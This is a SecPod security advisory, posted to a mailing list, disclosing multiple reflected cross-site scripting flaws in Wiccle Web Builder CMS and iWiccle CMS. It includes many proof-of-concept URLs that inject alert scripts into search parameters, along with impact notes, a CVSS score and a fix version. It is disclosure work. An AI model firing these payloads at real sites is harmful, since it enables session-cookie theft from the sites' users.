[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple XSS Vulnerabilities



Hi,

SecPod Research Team has found a vulnerability in Wiccle Web Builder CMS and iWiccle CMS Community Builder

Advisory details has been attached to this mail.


Regards,
SecPod Research Team
http://www.secpod.com
##############################################################################
Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple Cross-Site
Scripting Vulnerability.

SecPod Technologies (www.secpod.com)
Author Veerendra G.G
###############################################################################

SecPod ID:      1005                            09/07/2010 Issue Discovered
                                                09/10/2010 Vendor Notified
                                                09/13/2010 Vendor Confirmed
                                                09/14/2010 Fix Available


Class: Cross-Site Scripting                     Severity: Medium


Overview:
---------
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple
Cross-Site Scripting Vulnerabilities.


Technical Description:
----------------------
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple
Cross-Site vulnerabilities because it fails to properly sanitize user-supplied input.

NOTE: Vulnerability is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)

1) Input passed via the 'member_city' parameter to 'index.php' when 'module' is
   set to 'dating' and 'show' is set to 'member_search' is not properly verified
   before it is returned to the user.

   NOTE: This vulnerability exists only in Wiccle Web Builder CMS

   POC:
   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30


2) Input passed via the 'post_name', 'post_text', 'post_tag', 'post_member_name'
   parameter to 'index.php' when 'module' is set to various (Auctions, Audio etc.,)
   options and 'show' is set to 'post_search' is not properly verified before
   it is returned to the user.

   NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS
          and iWiccle CMS Community Builder).

   POC:
   * http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>


3) Input passed via the 'member_username', 'member_tags' parameter to 'index.php'
   when 'module' is set to 'members' and 'show' is set to 'member_search' is not
   properly verified before it is returned to the user.

   NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS
          and iWiccle CMS Community Builder).

   POC:
   * http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>


These can be exploited to execute arbitrary HTML and script code in a user's
browser session in the context of a vulnerable site. This may allow an attacker
to steal cookie-based authentication and launch further attacks.

The exploit has been tested in Wiccle Web Builder CMS 2.0 (wwb_101.zip) and
iWiccle CMS Community Builder (iwiccle_1211.zip)


Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML and
script code in a user's browser session in the context of a vulnerable site.


Affected Software:
------------------
Wiccle Web Builder CMS 2.0 (wwb_101.zip)
iWiccle CMS Community Builder 2.0 (iwiccle_1211.zip)


References:
-----------
http://www.wiccle.com/
http://secpod.org/blog/?p=130
http://wiccle.com/download/wwb_101.zip
http://wiccle.com/download/iwiccle_1211.zip
http://secpod.org/advisories/SECPOD_Wiccle_Web_Builder_and_iWiccle_CMS_Community_Builder.txt
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas


Proof of Concepts:
-----------------
   NOTE: It is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)

   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30

   * http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>


Other POC's:
-------------
  http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>


Workaround:
-----------
Not available


Solution:
---------
iWiccle CMS Community Builder 1.3.0 (iwiccle_130.zip)
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas


Risk Factor:
-------------
    CVSS Score Report
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = MEDIUM
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = PARTIAL
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.